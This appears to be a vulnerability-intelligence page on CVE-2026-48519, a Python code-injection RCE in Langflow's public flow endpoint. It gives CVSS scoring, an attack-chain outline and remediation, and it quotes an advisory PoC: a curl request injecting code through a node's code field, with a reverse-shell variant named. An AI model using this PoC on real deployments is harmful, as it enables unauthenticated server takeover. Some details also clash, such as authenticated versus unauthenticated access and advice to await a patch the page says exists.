What is the CVSS score of CVE-2026-48519?

CVE-2026-48519 has a CVSS 3.1 base score of 9.6 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H.

Which versions of Langflow are affected by CVE-2026-48519?

Langflow versions 1.9.1 and earlier contain a critical remote code execution vulnerability in the public flow sharing feature that allows unauthenticated attackers to execute arbitrary code on your…. A patch is available.

How to fix or mitigate CVE-2026-48519?

Within 24 hours: Disable public flow/Shareable Playground features across all Langflow 1.9.1 and earlier deployments; restrict network access to /api/v1/build_public_tmp API endpoint. Within 7 days: Complete inventory of all Langflow instances running version 1.9.1 or earlier and assess business dependency on public flow features; deploy WAF rules blocking POST requests to /api/v1/build_public_tmp endpoint. Within 30 days: Transition from Langflow 1.9.1 and earlier to either alternative workflow automation platforms or isolated internal-only Langflow instances; maintain vendor communication channel to track patch availability.

Langflow CVE-2026-48519

CRITICAL

Code Injection (CWE-94)

2026-06-16 https://github.com/langflow-ai/langflow

GHSA-v5ff-9q35-q26f

Python Code Injection RCE

9.6

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

9.6 CRITICAL

AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

vuln.today AI

10.0 CRITICAL

Endpoint is reachable over the network with no auth (AV:N/PR:N), single HTTP request triggers RCE without victim interaction (AC:L/UI:N), and code runs outside Langflow's security scope with full impact (S:C/C:H/I:H/A:H).

3.1 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Source Code Evidence Fetched

Jun 16, 2026 - 18:21 vuln.today

Analysis Generated

Jun 16, 2026 - 18:21 vuln.today

CVE Published

Jun 16, 2026 - 17:35 github-advisory

CRITICAL 9.6

DescriptionGitHub Advisory

Summary

The "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Simply sharing a flow exposes the deployment to RCE risk by authenticated users.

Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe

Details

Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!

The vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.

PoC

Reproduction:

Create a new flow and add a Chat Input node to it
Share the flow ("Shareable Playground")
Access the public link with the browser developers tools open and execute the flow.
Find the /api/v1/build_public_tmp route and copy as cURL
Edit the data.nodes[X].data.node.template.code.value JSON field with any python code and run the cURL command.

Example PoC (replace flow ID with the correct one), and download test_with_python.json:

bash

curl 'http://localhost:7860/api/v1/build_public_tmp/<flow-id>/flow?start_component_id=ChatInput-syEJp&log_builds=false&event_delivery=streaming' \
  -H 'Content-Type: application/json' \
  -b 'client_id=anything' \
  --data-raw "$(cat test_with_python.json)"

Search for touch /tmp/pwned in the test_with_python.json and edit for any other code.

The stacktrace for the code executed is:

...
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 495, in generate_flow_events
    ids, vertices_to_run, graph = await build_graph_and_get_order()
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 234, in build_graph_and_get_order
    graph = await create_graph(fresh_session, flow_id_str, flow_name)
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 298, in create_graph
    return await build_graph_from_data(
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py", line 192, in build_graph_from_data
    graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get("user_id"))
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1153, in from_payload
    graph.add_nodes_and_edges(vertices, edges)
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 270, in add_nodes_and_edges
    self.initialize()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 512, in initialize
    self._build_graph()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1305, in _build_graph
    self._instantiate_components_in_vertices()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1347, in _instantiate_components_in_vertices
    vertex.instantiate_component(self.user_id)
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py", line 382, in instantiate_component
    self.custom_component, _ = initialize.loading.instantiate_class(
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py", line 45, in instantiate_class
    custom_component: CustomComponent | Component = class_object(
  File "<string>", line 59, in __init__

Impact

Unauthenticated RCE on any deployment with a shareable playground.

Ori Lahav Security Researcher @ Rubrik Inc.

Articles & Coverage 2

News 6 New Python Vulnerabilities - 2 Critical, 4 High Severity Jun 17, 2026 News Critical RCE in Langflow ≤1.9.1 Public Flows Endpoint - CVE-2026-48519 Jun 16, 2026

AnalysisAI

Remote code execution in Langflow versions through 1.9.1 allows unauthenticated attackers to execute arbitrary Python code on the host by abusing the Shareable Playground (Public Flows) feature. When a flow is shared, the /api/v1/build_public_tmp endpoint accepts user-supplied node code in the JSON payload field data.nodes[X].data.node.template.code.value and executes it during graph instantiation. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Identify exposed Langflow with shared playground

Delivery

Obtain public flow ID from playground page

Exploit

Craft POST to /api/v1/build_public_tmp with malicious code.value

Execution

Server instantiates node and executes Python

Persist

Code runs in Langflow process context

Impact

Establish persistence or pivot to host/data

Access

Identify exposed Langflow with shared playground

Delivery

Obtain public flow ID from playground page

Exploit

Craft POST to /api/v1/build_public_tmp with malicious code.value

Execution

Server instantiates node and executes Python

Persist

Code runs in Langflow process context

Impact

Establish persistence or pivot to host/data

Vulnerability AssessmentAI

Exploitation	Exploitation requires that the Langflow deployment has at least one flow shared via the Shareable Playground (Public Flows) feature, exposing the route /api/v1/build_public_tmp/<flow-id>/flow, and that the attacker can reach that endpoint over the network and obtain or guess the public flow ID. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The supplied CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H scores 9.6, reflecting unauthenticated network exploitation with full CIA impact and a scope change to the underlying host. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker discovers an internet-exposed Langflow instance with at least one shared playground (e.g., via Shodan or by guessing the public link). They open the playground page, capture the /api/v1/build_public_tmp/<flow-id>/flow request, replace data.nodes[X].data.node.template.code.value with a Python reverse shell or os.system('touch /tmp/pwned'), and replay the cURL command to obtain unauthenticated code execution as the Langflow process user, as demonstrated in the published PoC.
Remediation	Vendor-released patch: upgrade Langflow to 1.9.2 or later (pip install --upgrade 'langflow>=1.9.2'), as documented in GHSA-v5ff-9q35-q26f (https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Disable public flow/Shareable Playground features across all Langflow 1.9.1 and earlier deployments; restrict network access to /api/v1/build_public_tmp API endpoint. …

Threat intelligence, references, and detailed analysis are available after sign-in.